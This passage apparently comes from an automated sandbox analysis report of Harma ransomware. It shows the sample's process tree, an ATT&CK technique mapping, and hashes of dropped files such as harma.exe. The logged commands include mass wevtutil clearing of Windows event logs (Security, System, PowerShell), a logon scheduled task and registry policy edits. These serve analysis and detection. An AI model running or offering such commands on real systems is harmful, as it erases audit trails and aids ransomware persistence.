wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
3⤵
PID:1720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
3⤵
PID:1604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
3⤵
- Clears Windows event logs
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
3⤵
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
3⤵
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
3⤵
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
3⤵
PID:1292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
3⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
3⤵
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
3⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
3⤵
- Clears Windows event logs
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
3⤵
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
3⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
3⤵
PID:880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
3⤵
- Clears Windows event logs
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
3⤵
PID:1964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
3⤵
PID:1720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
3⤵
PID:1604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
3⤵
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
3⤵
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
3⤵
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
3⤵
- Clears Windows event logs
PID:1292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
3⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
3⤵
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
3⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
3⤵
- Clears Windows event logs
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TunnelDriver"
3⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UAC/Operational"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
3⤵
PID:880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"
3⤵
PID:1964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"
3⤵
- Clears Windows event logs
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"
3⤵
PID:1720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
3⤵
PID:1604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
3⤵
PID:300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
3⤵
PID:1536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
3⤵
PID:540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
3⤵
- Clears Windows event logs
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
3⤵
PID:924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
3⤵
PID:364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
3⤵
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
3⤵
PID:1736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
3⤵
PID:760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"
3⤵
PID:1936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
3⤵
PID:1980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
3⤵
PID:580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
3⤵
- Clears Windows event logs
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
3⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"
3⤵
PID:544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
3⤵
- Clears Windows event logs
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
3⤵
PID:1760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
3⤵
PID:636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
3⤵
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
3⤵
PID:944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
3⤵
PID:1560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"
3⤵
PID:1948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
3⤵
PID:1800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
3⤵
PID:1232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
3⤵
PID:1708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
3⤵
PID:1960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
3⤵
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
3⤵
PID:788

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
3⤵
PID:2028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
3⤵
PID:1908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"
3⤵
PID:756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"
3⤵
- Clears Windows event logs
PID:1808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
3⤵
- Clears Windows event logs
PID:1728

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"
3⤵
- Clears Windows event logs
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Power"
3⤵
PID:1692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Render"
3⤵
PID:896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"
3⤵
PID:888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
3⤵
- Clears Windows event logs
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"
3⤵
PID:1096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"
3⤵
- Clears Windows event logs
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"
3⤵
PID:584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"
3⤵
PID:856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"
3⤵
PID:1984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"
3⤵
PID:468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"
3⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
3⤵
PID:1996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
3⤵
PID:1368

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
3⤵
- Clears Windows event logs
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
3⤵
PID:1012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"
3⤵
PID:1652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"
3⤵
- Clears Windows event logs
PID:772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
3⤵
PID:1932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"
3⤵
PID:1448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"
3⤵
PID:1312

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"
3⤵
PID:712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"
3⤵
PID:432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"
3⤵
PID:1160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"
3⤵
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"
3⤵
PID:220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
3⤵
PID:536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"
3⤵
- Clears Windows event logs
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"
3⤵
PID:1748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ntshrui"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"
3⤵
PID:1736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "OAlerts"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Security"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Setup"
3⤵
PID:1292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "System"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "TabletPC_InputPanel_Channel"
3⤵
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"
3⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"
3⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"
3⤵
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WMPSetup"
3⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WMPSyncEngine"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Windows PowerShell"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "muxencode"
3⤵
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
2⤵
PID:1084

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
3⤵
- Creates scheduled task(s)
PID:1800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
2⤵
PID:1232

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
3⤵
PID:948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
2⤵
PID:524

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
3⤵
PID:880

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:520

C:\Windows\system32\net.exe
net stop BMR Boot Service /y
1⤵
PID:1076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
2⤵
PID:1964

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\HRMPRIV
1⤵
- Modifies registry class
PID:1388

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HRMPRIV
2⤵
PID:1160

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Media Player.lnk.id-32B7E671.[decryptioner@uncryptfile.com].HARMA
1⤵
- Modifies registry class
PID:236

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x728
1⤵
PID:2036

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\FILES ENCRYPTED.txt
1⤵
PID:1084

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1648

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

File Permissions Modification

T1222

Modify Registry

T1112

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\FILES ENCRYPTED.txt
Filesize
118B

MD5
22696a2ddcd33c292082b9dafcdd8af2

SHA1
1948a7f094c013e531ccc67dfaa5935d538fb6e9

SHA256
ca2372ac6b1b80af08ebfb0e3f01a7c9e34f94591cc3fbdd6fec59000d2c8f44

SHA512
82c4dddf8e2f5fa4933590bc45d66f5906832fbc4d2a559547a444023fecf3f1fbdd96dd62e3161a11178c5a0e7958600bc753da077c7378c41573d22b515c59

Download Submit
C:\ProgramData\HRMPRIV
Filesize
2KB

MD5
1957b0a95c68b57b56d1951399164568

SHA1
a79624a7b25808685907f09f139a8c490e432f08

SHA256
c2eb61d6a64effa604370217ac25e24ee1de3ff312e8cdd6bd02375587351973

SHA512
7efd0afb1feaff75da3e7170c1267104011ab8216a07cedf498f7ea6ce6bdd38a5e6aa3d2969d1ae12d719a732812b5804f30c976d2f036ce3f91cda109d4b92

Download Submit
C:\ProgramData\HRMPRIV
Filesize
2KB

MD5
1957b0a95c68b57b56d1951399164568

SHA1
a79624a7b25808685907f09f139a8c490e432f08

SHA256
c2eb61d6a64effa604370217ac25e24ee1de3ff312e8cdd6bd02375587351973

SHA512
7efd0afb1feaff75da3e7170c1267104011ab8216a07cedf498f7ea6ce6bdd38a5e6aa3d2969d1ae12d719a732812b5804f30c976d2f036ce3f91cda109d4b92

Download Submit
C:\ProgramData\HRMPRIV
Filesize
2KB

MD5
1957b0a95c68b57b56d1951399164568

SHA1
a79624a7b25808685907f09f139a8c490e432f08

SHA256
c2eb61d6a64effa604370217ac25e24ee1de3ff312e8cdd6bd02375587351973

SHA512
7efd0afb1feaff75da3e7170c1267104011ab8216a07cedf498f7ea6ce6bdd38a5e6aa3d2969d1ae12d719a732812b5804f30c976d2f036ce3f91cda109d4b92

Download Submit
C:\ProgramData\HRMPUB
Filesize
292B

MD5
d72ed62e6d972ceb042a10a0378cb37f

SHA1
ba5d96c45f78de85ddf51cf6041320605cb7077a

SHA256
4ed11af279bf9d4c3b305550caab73561fe01fdf442c262bd52ee95a713401c6

SHA512
6ac08ba04d487720609730e0828e4e4d75279a836f1bc9f97bdf2861c2b0b31bcc9564f215785ae41f69128f72ba7f080e5d25f45fae2cc91207da4e5e4541cb

Download Submit
C:\ProgramData\HRMPUB
Filesize
292B

MD5
d72ed62e6d972ceb042a10a0378cb37f

SHA1
ba5d96c45f78de85ddf51cf6041320605cb7077a

SHA256
4ed11af279bf9d4c3b305550caab73561fe01fdf442c262bd52ee95a713401c6

SHA512
6ac08ba04d487720609730e0828e4e4d75279a836f1bc9f97bdf2861c2b0b31bcc9564f215785ae41f69128f72ba7f080e5d25f45fae2cc91207da4e5e4541cb

Download Submit
C:\ProgramData\HRMPUB
Filesize
292B

MD5
d72ed62e6d972ceb042a10a0378cb37f

SHA1
ba5d96c45f78de85ddf51cf6041320605cb7077a

SHA256
4ed11af279bf9d4c3b305550caab73561fe01fdf442c262bd52ee95a713401c6

SHA512
6ac08ba04d487720609730e0828e4e4d75279a836f1bc9f97bdf2861c2b0b31bcc9564f215785ae41f69128f72ba7f080e5d25f45fae2cc91207da4e5e4541cb

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe
Filesize
1.0MB

MD5
5c36e305d926e55ef98d392176890cd2

SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd

SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

SHA512
082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

Download Submit
C:\ProgramData\harma.exe
Filesize
1.0MB

MD5
5c36e305d926e55ef98d392176890cd2

SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd

SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

SHA512
